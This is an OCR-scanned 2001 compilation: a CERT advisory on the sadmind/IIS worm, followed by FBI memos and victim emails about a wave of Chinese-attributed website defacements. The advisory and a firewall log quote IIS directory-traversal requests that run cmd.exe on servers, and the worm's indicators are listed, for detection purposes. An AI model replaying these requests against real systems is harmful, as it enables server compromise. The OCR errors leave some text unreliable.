educa 


1 incidents, quick fixes 
1& vulncrabilitins 


A complete revision history is at the end of this file. 
Systems Affected 


e Systems running unpatched versions of Microsoft IIS 
e Systems running unpatched versions of Solaris up to, and including, Solaris 7 


Overview 


The CERT/CC has received reports of a new piece of self-propagating malicious code (refer 
here as the sadmind/HS worm). The worm uses two well-known vulnerabilities to compromis 
Systems and deface web pages. 


I. Description 


Based on preliminary analysis, the sadmind/IIS worm exploits a vulnerability in Solaris syste 
and subsequently installs software to attack Microsoft IIS web servers. In addition, it include: 
component to propagate itself automatically to other vulnerable Solaris systems. It will add "- 
the .rhosts file in.the root user's home directory. Finally, it will modify the index.html on the hi 
Solaris system after compromising 2,000 IiS systems. 


To compromise the Solaris systems, the worm takes advantage of a two-year-old buffer ove 
vulnerability in the Solstice sadmind program. For more information on this vulnerability, see 


http:/Awww.kb.cert.org/vuls/id/28934 
hitp:/Avww.cert.org/advisories/CA-1999-16.html 


After successfully compromising the Solaris systems, it uses a seven-month-old vulnerability 
compromise the IIS systems. For additional information about this vulnerability, see 


http://www.kb.cert.org/vuls/id/111677 


Solaris systems that are successfully compromised via the worm exhibit the following 
characteristics: 


€ Sample syslog entry from compromised Solaris system 


May 7 02:40:01 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Bus Error - core dumped 
May 7 02:40:01 carrier.domain.com last message repeated 1 time 


5/8/01 
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E May 7 02:40:03 carrier.domain.com last message repeated 1 time 
* May 7 02:40:06 carrier.domain.com inetd(139]: /usr/sbin/sadmind: Segmentation Fault - core dumped 
May 7 02:40:03 carrier.domain.com last message repeated 1 time 
INTERNET May 7 02:40:06 carrier.domain.com inetd[139]: /usr/sbin/sadmind: Segmentation Fault - core dumped 
SECURITY May 7 02:40:08 carrier.domain.com inetd[139): /usr/sbin/sadmind: Hangup 
ALLIANCE May 7 02:40:08 carrier.domain.com last message repeated 1 time 
May 7 02:44:14 carrier.domain.com inetd{139}: /usr/sbin/sadmind: Killed 


e A rootshell listening on TCP port 600 


e Existence ofthe directories 
o /dev/cub contains logs of compromised machines 
o /dev/cuc contains tools that the worm uses to operate and propagate 


e Running processes ofthe scripts associated with the worm, such as the following: 
o /bin/sh /dev/cuc/sadmin.sh 

/dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 111 

/dev/cuc/grabbb -t 3 -a .yyy.yyy -b .xxx.xxx 80 

/bin/sh /dev/cuc/uniattack.sh 

/bin/sh /dev/cuc/time.sh 

/usr/sbinñnetd -s /tmp/.f 

/bin/sleep 300 


O OOO O O 


Microsoft IIS servers that are successfully compromised exhibit the following characteristics: 


e Modified web pages that read as follows: 


fuck USA Government 
fuck PoizonBOx 
contact :sysadmen@yahoo.com.cn 


@ Sample Log from Attacked IIS Server 


2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /ctdir 2( 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 GET /scripts/../../winnt/system32/cmd.exe /ctdirt.. 
2001-05-06 12:20:19 10.10.10.10 ~ 10.20.20.20 80 X 

GET /scripts/../../winnt/system32/cmd.exe /ct+copyt\winnt\system32\cmd.exetroot.exe 502 - 
2001-05-06 12:20:19 10.10.10.10 - 10.20.20.20 80 X 

GET /scripts/root.exe /ctechot<HTML code inserted here>.././index.asp 502 - 


Il. Impact 


Solaris systems compromised by this worm are being used to scan and compromise other S 
and IIS systems. IIS systems compromised by this worm can suffer modified web content. 


intruders can use the vulnerabilities exploited by this worm to execute arbitrary code with roc 
privileges on vulnerable Solaris systems, and arbitrary commands with the privileges of the 
IUSR , machinename account on vulnerable Windows systems. 


We are receiving reports of other activity, including one report of files being destroyed on the 
compromised Windows machine, rendering them unbootable. It is unclear at this time if this 
activity is directly related to this worm. 


Ill. Solutions 


Apply a patch from your vendor 


http://www.cert.org/advisories/CA-2001-11.html 5/8/01 
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. A patch is available from Microsoft at 


http://www.microsoft.com/technet/security/builetin/MS00-078.asp 


For IIS Version 4: 
http://www.microsoft.com/ntserver/nts/downloads/ctitical/q269862/defauit.as 


For IIS Version 5: 
http:/Awww.microsoft.com/windows2000/downloads/critical/q269862/default.asp 


Additional advice on securing IIS web servers is available from 


http:/Avww.microsoft.com/technet/security/isSchk.asp 
http:/Avww.microsoft.com/technet/security/tools.asp 


Apply a patch from Sun Microsystems as described in Sun Security Bulletin #00191: 


http://sunsolve.sun.com/pub-cgi/retrieve. pl? 
doctypezcoll&doczsecbuli/191&typez0&nav-sec.sba 


Appendix A. Vendor Information 


Microsoft Corporation 

The following documents regarding this vulnerability are available from Microsoft: 
http//www.microsoft.com/technet/security/bulletin/MS00-078.asp 

Sun Microsystems 

Sun has issued the following bulletin for this vulnerability: 


http://sunsolve.sun.com/pub-cgi/retrieve. pl? 
đocfype=coli&doc=secbull/191 &type=O0&nav=sec.sba 


References 


1. Vulnerability Note VU#111677: Microsoft IIS 4.0 / 5.0 vulnerable to directory traversal 
extended unicode in url (MS00-078) http:/Avww.kb.cert.org/vuls/id/111677 
2. CERT Advisory CA-1999-16 Buffer Overflow in Sun Solstice AdminSuite Daemon sac 


http://Awww.cert.org/advisories/CA-1999-16.html 


Authors: Chad Dougherty, Shawn Hernan, Jeff Havrilla, Jeff Carpenter, Art Manion, lan Fini 
John Shaffer 


This document is available from: hitp:/Avww.cert.org/advisories/CA-2001-11.html 
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. Email: cert@cert.org 

Phone: +1 412-268-7090 (24-hour hotline) 

Fax: +1 412-268-6989 

Postal address: 
CERT Coordination Center 
Software Engineering Institute 
Carnegie Mellon University 
Pittsburgh PA 15213-3890 
U.S.A. 


CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4) Monday throug 
Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weeke 


Using encryption 


We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is 
available from 


http://www.cert.org/CERT. PGP.key 
If you prefer to use DES, please call the CERT hotline for more information. 
Getting security information 
CERT publications and other security information are available from our web site 


http:/Avww.cert.org/ 


To subscribe to the CERT mailing list for advisories and bulletins, send email to 
majordomo@cert.org. Please include in the body of your message 


subscribe cert-advisory 


* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark 
Office. 


NO WARRANTY 

Any material furnished by Carnegie Mellon University and the Software Engineering 
Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warrar 
of any kind, either expressed or implied as to any matter including, but not limited to, 
warranty of fitness for a particular purpose or merchantability, exclusivity or results 
obtained from use of the material. Carnegie Mellon University does not make any wan ` 
of any kind with respect to freedom from patent, trademark, or copyright infringement 


Conditions for use, disclaimers, and sponsorship information 
Copyright 2001 Carnegie Mellon University. 


Revision History 


May 08, 2001: Initial Release 
May 08, 2001: Formatting change to improve printing 
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Precedence: ROUTINE ) Date: 05/15/2001 
To: Counterterrorism Attn:  NIPC, CIU 
SS 
"e Attn: SA 
b3 
From: Cleveland e 
LC 


Squad 16 


contact: [ _ |] ge 


Approved By: 


Drafted By: 


Case ID idi: (Pending) aM 


Title:  Unsubs; 
Pioneer Standard Electronics 
Solon, OH - Victim 
Unauthorized Intrusions from China 


Synopsis: Attempts were made to gain unathorized access to a 
Cleveland area web server from China on 5/10/01 and unauthorized 
access was obtained on a mailbox exchange web server on 5/9/01 at 
which time a default web page was defaced. 


Details: b6 
Pionee ectronics, 28600 Fountain Parkway, Solon, OH b7C 
telf advised SAL ]on 5/15/01 that 


attempts were made by hackers in China to make unauthorized 
access to the web site for Pioneer Standard, 

www. underground. pios.com. advised that 

underground. pios.com is a secured business to business e-commerce 
web site for computer systems divisions of Pioneer Standard 
Electronics. He advised that the firewall (199.33.129.111) and 
four web servers are physically located in Garfield Heights, OH. 
He advised that when a web browser points to the 
underground.pios.com address, the firewall can direct them to any 
of the four web servers on a rotation basis. advised 
that the system is set up to e-mail him when errors on the 
Servers occur. He stated that on 5/10/2001 at 11:52 AM EST, he 
was notified via email 
firewall administrator, 
Garfield Heights location. then observed attempts by some 
hacker from "helc.edu.cn", a site of a Chinese University, making 
ping and http commands against their web SE ise red 


these commands as attempting to access the system files on the 


* 


a 


To: no From: Cleveland i 
Re: [| 05/15/2001 


server. He advised that the servers run Windows 2000. 
advised that the attempts to access their system was exclusively 
at port 80 (the http protocol) at a "\scripts" directory. 

advised that the hacker made 14 identical attempts at 
accessing the system folders.| |  laávisea Cat Jblocked 
access from the Chinese IP address at the firewall. 


HE o that then at 21:30 on 5/10/2001, 
another attempt was made on their web server to gain unauthorized 
access. These http commands were directed to default web pages at 
the "\msadc" directory. This attempt was made from a site in Asia 
with an IP address of 211.91.132.240.[ ^  ]advised that this 
IP address does not resolve to a domain name. He advised that 
ddress is a SunOS box that can be accessed using telnet. 
CES that he checked other sites on the class B 
network with this IP address = and determined that they were 


all from China and Taiwan. had this IP blocked at the 
router. 


Eee Larl T had then determined 
that an externa 


machine off their network, an exchange mailbox 
web server was accessed sometime on 5/9/2001 and an unused 
default web page was defaced. The defaced page stated "Fuck the 
US Government" and was signed by someone using a name like 
"Poizon". The defaced page also made a reference to contacting 
the Administrator at Yahoo.com.| Ria not save a copy of the 
defaced page. 


[ ts not determined a dollar loss due to this 
hacking incident but advised that he spent one full day resolving 
the problem and the firewall administrator spent a few hours on 
this problem. 


Cleveland is providing this information to Chicago 


since zs GENI. coordinating all web page 
defacements/unauthorized intrusions from China. 
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To: — à From: Cleveland 
S mm C 2, 


LEAD (s): 
Set Lead 1: 
COUNTERTERRORISM 
AT WASHINGTON, DC 
Read and clear. 
Set Lead 2: 
CHICAGO 
AT CHICAGO 


Action deemed appropriate. 


++ 
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Investigation on 05/09/2001 at Pendleton, Oregon (telephonically) 


it and its contents are not to be distributed outside your agency. C] b6 


FD-302 (Rev. 10-6-95) - o e 


ED 
FEDERAL BUREAU OF INVESTIGATION 


Date of transcription 05/11/2001 


b6 


On May 9, 2001, qu 


Union Baker Educational Service District, 10100, McAlister Road, 
Island City, Oregon, 97850 (541) 963-4106, FAX (541) 963-7256 
telephonically contacted the writer and advised of the following: 


Her network suffered two attacks, the first coming on May 
5, 2001. She did not become aware of the attack until 05/07/2001 
when a web page was inserted to her site in place of a page that 
should have allowed booking of multi media films for the school 
district. The hackers redirected all of her links so that after 
seeing the opening page of the ESD web site users were directed to 
a page that read "fuck USA Government, fuck PoizonBOx, 


contact:sysadmcnGyahoo.com.cn". The page was red lettering on a 
biack background. 


The box that was attacked was using NT 4.0 running 
Service Pack 6A. The only function of the box was to reserve films 
and constituted a small part of her network. In researching the 
attack, she determined that a file RIT.EXE had been placed in the 
\Scripts directory. It appeared to her that this file would allow 
the hackers to have back door access to her system. She also 
thought that it would have allowed them to log passwords as her 
users logged onto the system. 


Her system has a direct link through multiple T1 
connections to the University of Oregon. Most school districts 
receive connections to the Internet through Oregon Public 
Education. However, because of her remote location and the fact 
that several school districts connect through her system she was 
given direct access to the University of Oregon. She believed the 
other school districts that were attacked also were directly 
connected to the University of Oregon rather than through Oregon 
Public Education. 

provided two copies of NeoTrace routings xn 
regarding the attack sites. She also provided a copy of the HTML 
code for the inserted Sản le L willing to cooperate in any 
way she could to aid in the investigation of this matter. 
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Date dictated 05/11/2001 


. It is the property of the FBI and is loaned to your agency; 
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Serial # of Originating Document 
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(Addtess of Contributor) 


Lote rele 02- 
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Grand Jury Material - Disseminate Only Pursuant to Rute 6 (e) 
Federal Rules of Criminal Procedure a 
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Reference: 


b7C 
-From: ” 
Sent: Thursday, May 10, 2001 12:15 PM 
To: 'eugene.portland @ fbi.gov' 
default.asp index.asp đefculthim index.him 
««default.asp»» <<index.asp>> 
««default.htm»» <<index.htm>> 
b6 
b7C 


> The Corvallis Clinic, P. C. 


> http:/Avww.corvallis-clinic.com 

> P 541-753-1618 

> F 541-758-2685 

> dekeiejedededeiekekekeseeseiekeekedokedlekekesek 

» CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is 
» for the sole use of the intended recipient's and may contain confidential 

» and privileged information. Any unauthorized review; use, disclosure or 

> distribution is prohibited. If you are not the intended recipient, please 

> contact the sender by reply e-mail and destroy all copies of the original 

» message. Any stated opinions are those of the author and are not 


> necessarily those of The Corvallis Clinic 
> 


<html><body bgcolor=black><br><br><br><br><br><br><table width=100%><td><p 
align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p 
align="center"><font size=7 color=red>fuck PoizonBOx<tr><td><p 

align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html> 


fuck USA Government 
fuck PoizonBOx 


contact:sysadmcn Q yahoo.com.cn 


file://C:\TEMP\index.htm 


Page 1 of 1 


5/14/01 


é 


b7C 
From: 
Sent: 14, 2001 6:33 PM 
To: 
Subiect: The Corvallis Clinic, P.C. 

B: 
Bongen? 
Here is what | have found so far. 
<<corvallis.zip>> 
> b6 
b7Œ 


> 
> The Corvallis Clinic, P. C. 


> http:/www.corvallls-clinic.com 

> P 541-753-1618 

> F 541-758-2685 

> d NA de NN N K kikk 

» CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is 
> for the sole use of the intended recipients and may contain confidential 
» and privileged information. Any unauthorized review; use, disclosure or 
> distribution is prohibited. If you are not the intended recipient, please 

» contact the sender by reply e-mail and destroy all copies of the original 
> message. Any stated opinions are those of the author and are not 

> necessarily those of The Corvallis Clinic 

> 
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b7C 
From: _——— 
Sent: Monday, May 14, 2001 11:23 P 
To: MIS 
Cc: Endeavour; 
Subject: Changes due to the hack. 
Importance: High 


Using patch work (patchwrk.exe) from the Global Incident Analysis Center I 
analyzed the vulnerabilities on Endeavour. Using the Microsoft Windows 
update http://windowsupdate.microsoft.com/ | down loaded and installed the 
recommended security patches. Using patch work | applied the suggested 
patches in Microsoft security bulletins MS99-025, MS00-008 and MS00-086. 
Reran patch work and came up clean on all but one registry issue. | have not 
been able to get this remaining suggested patch to take. Will look into it 
more tomorrow. Most if not all of the holes have been plugged. 


On all servers the FTP and WEB services have been disabled or set to manual 
start. Additionally the PCanywhere on challenger and Exeter have been set to 
manual. If anyone such as HBOC needs access to these servers the PCanywhere 
host service must be manually started and then stopped after the support 

access in completed. The FTP services on the av3650, d380 and g70 have been 
left on. These three systems are not accessible from the Internet. FTP is 
necessary on the av3650, d380 and g70 for HBOC support and are not 
accessible by anonymous, the user must have a valid user ID and password. 


During the analyses the first attack on Endeavour was 3/3/2001 the last one 
was last Friday 5/12/2001. Each one would progress a little further. It 
appears that there were attacks on 5/4/2001 and 5/10/2001. The web page 
defacing took place on the 4th and the 10th of May. The attack on Friday the 
12th was unsuccessful due to us catching it on Thursday and stopping 
services, changing file names and registry entries. 


The attack takes advantage of known vulnerabilities in Microsoft's IIS that 
had not been patched. The attacker would FTP a set of files to the FTP 
server. Using a web browser enter a URL string that would make a copy of 
CMD.EXE in the scripts directory on the IIS server. Then Using the web 
browser use the copied CMD file execute the FTP'd files to install and 
applications and services on the server. These services would then allow the 
intruder to take control of the server and gain access to the file system of 
the server. This would also allow them to capture the login name and 
password of the user logging into the server, in our case the administrators | 
account. It is assumed at this point the attacker has our administrative 
password. After installing a few utilitys, programs and asp scripts, delete 


‘most of the downloaded items leaving only what was necessary to maintain 


control. 


When monitoring our servers tell tail signs of an attack are services 
MMTASK, OS2SRV and INDEX running. Processes running such as FireDaemon.exe, 


Newgina.dll and SUD.exe. If anyone sees these on any servers notify[ — 1] b6 
-— e O mmedetoy, page us if you have to. Not b7C 
all of ihese must be running at the same time but any one or more in any 


combination. The tools for this kind of an attack are readily available on 
the Internet and could have been accomplished by any knowledgeable 
determined teenager. 


| have not been able to determine beyond a doubt what other information has 
been compromised. It however appears that no other systems or data has been 
accessed. There is no evidence to suggest that there has been anything done 


i 


Mx 


UR AP 


~ T 
beyond defacing a few web pages and obtaining the administrators password. 1 
have been working with an FBI agent in Portland[ — — — ]concerning 
this attack. Agen has told me that there have been 15 known 
attacks exactly like ours on sites in Oregon in the last few weeks . In all 
cases the extent of the damage was defacing of web pages only. These attacks 
are coming from locations inside the Peoples Republic of China. At agent 
an 7792 | have sent him copies of log files and other information 
pertinent to the investigation. 


In the next few days we will be evaluating the impact on server process and 
other systems the changing of the administrators password. All other 
passwords should be changed based on the assumption that other passwords 
have been obtained. There is no evidence that they have, it is assumed. It 

is better to be safe than sorry nd l are evaluating the configuration 

of the PIX firewall to tighten up access to our systems. This type of attack 

can not be prevented by a firewall. However the more access there is through 
the firewall to internal systems the more vulnerable we are. 


This has been one of those things that you wish had not happened, should not 
have happened, but has turned into a valuable learning experience. | hope 
that this has opened our eyes as department to the importance of security, 
tech bulletins and system patches. Let us all work together and diligently 
pursue a secure environment for our patients data. Events such as this could 
have a direct impact on patient care and the reputation of the clinic. 


> | : = ois P.C. 


> http://www.corvallis-clinic.com 
> P 541-753-1618 
> F 541-758-2685 


> kk kokke k k kok kek k kkoo kiok kkk 


> CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is 


> for the sole use of the intended recipients and may contain confidential 
> and privileged information. Any unauthorized review; use, disclosure or 
> distribution is prohibited. If you are not the intended recipient, please 

> contact the sender by reply e-mail and destroy all copies of the original 

» message. Any stated opinions are those of the author and are not 

» necessarily those of The Corvallis Clinic 

> 
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A H Aou A Ñ T E. 
README.TXT DEFAULT.ASP DEFAULT.HTM INDEX.ASP INDEX.HTM log.zip 
Monday, 
May 14, 2001 
b6 
b7C 


On Monday, at approximately 8AM, | received notification that, while trying 
to access our web site, users and employees instead saw the attached file in 
place of our normal web page. 


One of our IT employees arrived at the lab before | did, and was able to 
copy our regular web site files back into place. He put the files left by 
the hacker into a separate directory for future reference. He said he also 
found that the hackers had left copies of their web page in a number of 
other directories. It appears that none of our files were deleted, changed 
or damaged. 


The setup for the Coffey Labs computer that was hacked is: 

2-x86 Family 6 Model 5 Stepping Genuine Intel 400mhz CPU, with 526megs of 
RAM. We are running NT4.0, build 1381:Service Pack 5. If you need more 
hardware info, NIC cards, etc. Pd be happy to supply a full run-down. 


One of the sites that we host for a client (Grand European Tours, or GET) d 
also had its web site replaced with the hackers web page. There was a log 

report from the GET hack, and | have attached the zipped files to this 

report. 


Please feel free to contact me with any questions. The ones | can't answer | 
will relay to the proper parties here, and then get back to you. 


Thank you for your interest, and again, if | can be of any further 
assistance, please let me know. 


| | b6 
y Laboratories, Inc. b7C 


12423 NE Whitaker Way - Portland, Oregon 97230 
503-254-1794 
fax 503-254-1452 
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beat down all the hegemonism of the world 
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China Redhackers wi 


Ail the Chinese must be united and battle for honour of our homeland 


Fuck U.S.A 


This Website was hacked by ?Jelly? of ChinaEagle 
for beating down all the hegemonism of USA ' 
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FEDERAL BUREAU OF INVESTIGATION 


Precedence: ROUTINE Date: 05/17/2001 

To: Counterterrorism Attn: Computer Investigations Unit, 
CIOS, NIPC 
SSA b3 
SSA b6 


⁄ Room 11719 b7C 
Deeg SE v 


From: Portland 
Squad 4 


Contact: SAL  — ](503) 615-6627 


Approved By: 


Drafted By: 
Case ID #: Pending) 
Title: HACKER/HONKER UNION OF CHINA 

CHICAGO SYSTEMS GROUP - VICTIM 

INTRUSION i 
Synopsis: Furnish Chicago with Web Defacement incident reports. 
Enclosure (s): Enclosed for Chicago are the following: 

May 7, 2001 e-mail, with attachments, Son ` b6 


Timber Products Company, to sa  — ](previousiy pe 
forwarded to Sal ` ]via e-mail). 


2. May 7, 2001 Facsimile from NIPC to sa[ — ] | 
submitted by[ "TT Port of Portland. 

3. May 14, 2001 e-mail, with attachments, from 

to BI] (previously forwarded to SA via e- 


mai 

4. May 9, 2001 e-mail from] Multnomah County 
ISD, to sap] (previously forwarded to SA[ ^  ]via e- 
mail). 


5. May 9, 2001 Facsimile from Union 
Baker Education Service District (ESD), to SA 
6. May 15, 2001 e-mail, with attachments, Eron 


ae Baker ESD, to SAL — | (previously forwarde 
to SA 


via e-mail). 


b7E 


To: | Co mM From: Portland @ 
Re: 05/17/2001 


7. Original and copy of an FD-302 for interview of 
and 1a containing interview notes. b6 
b7C 
8. May 10, 2001 e-mail, with attachments, from 
The Corvallis Clinic, to SA (previously 
forwarded to sa[ |] via e-mail). 


9. -May 14, 2001 e-mail, with attachments, from[ 
L | lto ER[- —— T forwarded to SA via e- 


10. May 14, 2001 e-mail fron ^ ]to SAL ] 


(previously forwarded to sa|  |via e-mail). 


11. May 14, 2001 e-mail, with attachments, from 


a Coffey Labs, to sat _____| (previously forwarded to SA 
v 


ia e-mail) 


12. Printout of web page for Lincoln City Chamber of 
Commerce (www35.npt.clipper.net). 


Details: Pursuant to telephone calls between SAL) and SA 
Portland is submitting Chicago with reports o£ 
the following China originated web site defacements: 


Telephone advised Portland that a server, hosting 
their corporate home page at IP address 207.109.247.150, had been 
compromised. Their web page was replaced with the following 
information: 


On May 4, prd ear! Timber Products b6 
Company, In ad , Springfield, Oregon 97477, b7C 


: fuck USA Government 
fuck PoizonBOx 
contact:sysadmcneyahoo.com.cn 


IL that the web site was running on es 
a Microsoft IIS4 web server with NT service pack 5. The server 


was behind an Axent Raptor 6.5 firewall and was also protected 
with a strong NT password. The firewall logged the Port 80 
attack originating from IP 211.96.252.251, which resolves to 
China United Telecommunications Corporation. The attack 
exploited a vulnerability in IIS. The web server was 


subsequently rebuilt, costing several hours of 
tine. — ]Eoung no evidence th tacker di 
anything but replace the web page. also found no 


evidence of the remaining network being compromised. 
provided firewall logs in the enclosed e-mail. 


To: counterterror ` From: Portland @ ` 
pe: Do] 05/17/2001 


On May 7, 2001, £P nd, 121 
NW Everett, Portland, Oregon, Telephone advised 
Portland that on May 3, 2001, a server, hosting eir web page at 


IP address 207.109.34.83, www.portptld.com had been 
compromised. Their web page was replaced with the following 
information: 


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcneyahoo.com.cn 


Lez indicated that the web site was running ona 
Microsoft web server with NT service pack 6. The server was 
exploited via a previously identified IIS vulnerability addressed 
by Microsoft in Security Bulletin MS00-078. The attack was 
logged to IP addresses 211.96.252.251, which resolves to China 
United Telecommunications Corporation and 61.142.242.231, which 
resolves to China Telecom. | indicated that the IIS logs 
show that the changes to the web page had originated from the 
211.96.252.251 IP address. About an hour later, the log picked 
up the other IP address, He L was being used to 
verify the defacement. ound no evidence of the remaining 
network being compromised. 


The compromised server was used by the Port of Portland 
employees to access their Internet e-mail. The server was not 
frequently used, and was not behind a firewall. It was running 
Networks Associates Cyber Cop i Lon detection software; 
however, no alerts were given. Le s his co-workers have 
spent approximately 12 hours on tnis matter. The server was 
patched with the appropriate hot fixes. All of the compromised 
files were moved to a desktop folder and provided to Portland, 
along with the IIS log, in the enclosed e-mail. 


On May 7, 2001,  — | Multnomah County ISD, 4747 

East Burnside, Portland, Oregon, Telephone (503) 988-3749 ext 

advised Portland that on May 6, 2001, four servers in 
their Data Center had been compromised, resulting in their 
default web pages being overwritten. The servers were exploited 
via a previously identified IIS vulnerability addressed by CERT 
Advisory CA-2001-11 sadmin/IIS/Worm. The worm exploits a buffer 
overflow vulnerability in Solaris systems. After compromising 
the Solaris system, the worm compromises the IIS systems through 
the vulnerability addresses in Security Bulletin MS00-078. The 
attack was logged to IP address 211.75.85.1, which resolves to 
Chunghwa Telecom Co., Taipei, Taiwan. is continuing to work 
on assessing the damages to the network and will furnish results 
and logs to Portland when completed. 
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To: — —— 2 From: Portland e 
re: [ — — — —] 05/17/2001 


On May 8, aoo MEE Union-Baker Education 
Service District, 10100 McATister Road, Island City, Oregon, 
Telephone advised Portland that from May 4th to 


May 6, 2001, two of their servers had been compromised, with 
their web page being replaced with the following information: 


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcneyahoo.com.cn 


Both IIS servers were running Windows NT 4.0 service 
pack 6A. One of the servers, an HP, was rebuilt as it was the 
server for a Novell Database server. The other, a Dell Power 
Edge, which hosts a special education database, has not been 
fully repaired. It has only had IIS reinstalled and the inetpub 
directory erased. Neither server was behind a firewall. Both 
servers are still off-line. To date, approximately $1,500 in 
labor costs have been associated with this hacking incident. The 
Servers were compromised through a known vulnerability in IIS 
FTP. The hacker ran command line which allowed them to remotely 
view the system and steal passwords. In researching the attack, 

determined that a file, rit.exe, had been placed in the 
\Seripts directory. This file appeared to give the hacker 
backdoor access to the system. All of the passwords have since 
been changed. No other systems on the network appear to have 
been compromised. Logs from both servers were provided to 
Portland in the enclosed e-mail. 


On May 10, oo) EE Corvallis Clinic, 
Corvallis, Oregon, Telephone (54 -1618 ext. advised 
Portland that one of their servers named home.corvallis- 


clinic.com, IP Address 207.109.247.163, had been compromised. 
Their web page was replaced with the following information: 


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcneyahoo.com.cn 


The compromised IIS Web Server was running Windows NT 
4.0 service pack 5, and was behind a Cisco Pix firewall. 
indicated that the hacker used the backdoor.wlf and 
backdoor.nthack tools to compromise the server. Log files 
reflect that the attack originated from IP address 
211.96.252.251, which resolves to China United Telecommunications 
Corporation and 209.211.205.56, which resolves to LCI 
International, 4650 Lakehurst Court, Dublin, Ohio. Ps and 
his co-workers have spent approximately 2 X days on is matter 
assessing the damages and repairing the system. [ ^ ]aiso 
installed Norton Anti-Virus on the local machine. 
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To: — | From: Portland o 
Re: [  — — — — ]05/17/2001 


[ indicated that the server hosts the clinics e- 
mail and exchange server, and is also used for departmental 
shared files. The clinic has 80 doctors on staff and 40,000 
active patients. [  — ]has not found any evidence of the 
doctor/patient information being compromised. [ ^  ]aiso has 
not found any other damage to the network outside of the defaced 
web pages. 


[ ^ |]renamed all of the compromised files with a 
back extension. [ ^ also made a copy of the registry files. 
deleted the default and index .asp and .htm files, which 
contained the defaced web page. Copies of the compromised files 
and logs were provided to Portland in the enclosed e-mail. 


On May 08, e ==: Coffey Laboratories 
Inc., 12423 NE Whitaker Way, Portland, Oregon, Telephone (503) 
254-1794, advised Portland that their server hosting the 
companies web site at www.coffeylabs.com, IP 192.168.1.10, had 


been compromised on May 7, 2001. Their web page was replaced with 
the following information: 


fuck USA Government 
fuck PoizonBOx 
contact:sysadmcneyahoo.com.cn 


The compromised IIS server was running Windows NT 4.0 
service pack 5. The server was outside of the companies internal 
network, and was used for its customers to log in and obtain 
Scientific reports. No other damage was done to the server. The 
server was not behind a firewall and had no logs available. 

estimated their damages at approximately two hours of 
abor spent repairing the system. 


stated that Coffey Labs also hosts a client, 
Grand European Tours (GET), on their network. GET also had their 
web page replaced with the same information that was left on the 
Coffey Labs server. [ ^ |provided the GET IIS logs in the 
enclosed e-mail. 


On May 3, 2001, Clipper.net, 2295 
Coburg Road, Eugene, Oregon, Telephone advised 
Portland that one of their client's NT 4.0 servers, located in 


Newport, Oregon, had been compromised. The server hosted the web 
Site for the Lincoln City Chamber of Commerce at 
www35.npt.clipper.net. The hacker replaced the Chamber of 
Commerce home page with one containing anti-American propaganda 
(see enclosure #12). [| ]|inđicated that no other damage 
was done to Clipper.net's systems. 
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, b3 
To: PENTE, ` From: Portland e b7E 


"7... sec... 
Clipper.net advised Portland that the compromised server had not ST 


yet been examined. Because the server is located in N 


Oregon, has not an opportunity to travel there. 
indicated that Clipper.net was recently purchased by Somitrol 
Security System. As a result, they will no longer have servers 


outside of the Eugene facility. The compromised server in 
Newport will eventually be relocated to Eugene, and has not yet 
been repaired. stated that when he has an opportunity to 
travel to Newport, he will examine the compromised system and 
provide any relevant data to Portland. 


Portland is awaiting incident reports from other 
victims and will provide them to Chicago upon receipt. 


+o 


Sent: 7,2001 9:42 AM 
To: 
Subject: eb Site Hac 


barn e " m 
2 A | 
chilog.txt default.asp default.htm . Index.osp Ines bim 


Here is the data that we spoke about on Friday. The file chilog.txt 
contains the logs from our 
corporate firewall. The remaining files are the files that were created on 
our web server. Would appreciate any info that you could provide on this. 
Best regards, 


Sincerley, 


| i = L, 


Our Network topology is as follows: 


Firewall - Axent Raptor 6.5 on NT4.0 platform, 3 NICs (Internet / Internal 
network / Service network) 

Internal Network - NT4.0 domain 

Service network - ll84 webserver (corporate internet presence) 


Mm tata sra p E En as o ps n Uh hm m ta p iH m am m a m Pa Pn tm m m n m m ta nme 


End 


Details: 


At approximatley 12:40 PST May 4 2001, the Timberproducts Company corporate 
website (207.109.247.150) 

was defaced with an anti-us government message . The web site was running 
on a Microsoft USA web server with NT service pack 5 installed. The NT 

server had uneeded services disabled and used a nine charater administrative 
password (alpha/numeric mix). 


This attack was logged as originating from PL] APNIC 


database provides the following 
information on this IP address: 


inetnum: 211.95.192.0 - 211.97.63.255 

netname: CNUNINET-GD 

descr: China United Telecommunications Corporation 
country: CN 

admin-c: RX9-AP 

tech-c:  RX9-AP 

mnt-by: | MAINT-CNNIC-AP 

changed: xry@bj.cnuninet.net 20010113 

source: — APNIC 


person: 
address 
Avenue, 
country: 
phone: 


L 
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e-mail: 
nic-hd: HRX9-AP 


" mnt-by: _MAINT-CNNIC- 
changed: 
source: APNIC 


The attack consisted of replacing default web site home pages with pages 
containing the ant-government messages. 
This attack was discovered the following morning and the web site was taken 
off-line. The web server was subsequently erased and rebuilt. Web site was 
again on-line and operational later that evening. 


««chilog.txt»» <<default.asp>> ««default.htm»» <<index.asp>> 
<<index.htm>> 
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chilog 
May 04 00:40:55.774 quebec httpd[325]: 121 Statistics: duration-0.04 i 
d-6uR84 sent-18 rcvd-137 srcif=Vpn6 src=211.96.252.251/50547 cldst=207 
.109.247.150/80 svsrc-10.96.0.1/5331 dstif-Vpn5 dst-10.96.0.5/80 op=GE 
T arg-x result-"400 Bad Request" proto-http rule-388 
May 04 00:40:56.167 quebec httpd[325]: 121 Statistics: đuration=0.03 i 
đ=6uR86 sent=66 revd=505 srcif-Vpn6 src-211.96.252.251/50598 cldst-207 
.109.247.150/80 svsrc-10.96.0.1/5332 dstif-Vpn5 dst-10.96.0.5/80 op=GE 
T arg=http://10.96.0.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+di 
